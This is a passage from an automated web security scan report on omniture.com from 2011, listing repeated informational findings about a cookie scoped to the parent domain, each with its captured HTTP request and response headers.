imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:24:42 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/product_tours/form HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; s_sv_s1=1@29@a//1296661247027/594025749283; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:24:42 GMT
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Wed, 02 Feb 2011 19:24:42 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:24:42 GMT
Content-Length: 14126
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:24:42 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Omniture | Products Tours & Add
...[SNIP]...

11.396. http://www.omniture.com/en/products/conversion previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/products/conversion

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 18:59:54 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/products/conversion HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 18:59:54 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 18:59:54 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 18:59:54 GMT
Content-Length: 24236
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 18:59:54 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Online Conversions, Target Mark
...[SNIP]...

11.397. http://www.omniture.com/en/products/conversion/merchandising previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/products/conversion/merchandising

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:00:14 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/products/conversion/merchandising HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:00:14 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 19:00:14 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:00:15 GMT
Content-Length: 31731
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:00:14 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Omniture | Conversion | Merchan
...[SNIP]...

11.398. http://www.omniture.com/en/products/conversion/publish previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/products/conversion/publish

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:00:20 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/products/conversion/publish HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:00:20 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 19:00:20 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:00:20 GMT
Content-Length: 24910
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:00:20 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Content Management System | Ent
...[SNIP]...

11.399. http://www.omniture.com/en/products/conversion/recommendations previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/products/conversion/recommendations

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:00:21 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/products/conversion/recommendations HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:00:21 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 19:00:21 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:00:21 GMT
Content-Length: 31203
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:00:21 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Omniture | Conversion | Recomme
...[SNIP]...

11.400. http://www.omniture.com/en/products/conversion/searchandpromote previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/products/conversion/searchandpromote

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:00:39 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/products/conversion/searchandpromote HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:00:39 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 19:00:39 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:00:39 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:00:39 GMT; path=/; domain=omniture.com
Content-Length: 34884

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Site Search, Website Search Eng
...[SNIP]...

11.401. http://www.omniture.com/en/products/conversion/survey previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/products/conversion/survey

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:00:42 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/products/conversion/survey HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:00:42 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 19:00:42 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:00:42 GMT
Content-Length: 28970
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:00:42 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Online Survey, Voice of Custome
...[SNIP]...

11.402. http://www.omniture.com/en/products/conversion/testandtarget previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/products/conversion/testandtarget

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:00:53 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/products/conversion/testandtarget HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:00:53 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 19:00:53 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:00:53 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:00:53 GMT; path=/; domain=omniture.com
Content-Length: 36398

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Website Optimization & Tracking
...[SNIP]...

11.403. http://www.omniture.com/en/products/conversion/testandtarget11 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/products/conversion/testandtarget11

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:01:10 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/products/conversion/testandtarget11 HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:01:10 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 19:01:10 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:01:10 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:01:10 GMT; path=/; domain=omniture.com
Content-Length: 34796

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Test and Target1:1 | Behavioral
...[SNIP]...

11.404. http://www.omniture.com/en/products/marketing_integration/closed_loop_marketing previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/products/marketing_integration/closed_loop_marketing

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:03:53 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/products/marketing_integration/closed_loop_marketing HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:03:53 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 19:03:53 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:03:53 GMT
Content-Length: 25652
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:03:53 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Omniture Closed Loop Marketing<
...[SNIP]...

11.405. http://www.omniture.com/en/products/marketing_integration/genesis previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/products/marketing_integration/genesis

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:03:32 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/products/marketing_integration/genesis HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:03:32 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 19:03:32 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:03:32 GMT
Content-Length: 26018
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:03:32 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Email Marketing Software | Sale
...[SNIP]...

11.406. http://www.omniture.com/en/products/marketing_integration/genesis/applications previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/products/marketing_integration/genesis/applications

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:03:47 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/products/marketing_integration/genesis/applications HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:03:47 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 19:03:47 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:03:47 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:03:47 GMT; path=/; domain=omniture.com
Content-Length: 33517

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Omniture Genesis Applications |
...[SNIP]...

11.407. http://www.omniture.com/en/products/multichannel_analytics previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/products/multichannel_analytics

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:02:29 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/products/multichannel_analytics HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:02:29 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 19:02:29 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:02:29 GMT
Content-Length: 23380
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:02:29 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Business Intelligence Software
...[SNIP]...

11.408. http://www.omniture.com/en/products/multichannel_analytics/insight previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/products/multichannel_analytics/insight

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:02:34 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/products/multichannel_analytics/insight HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

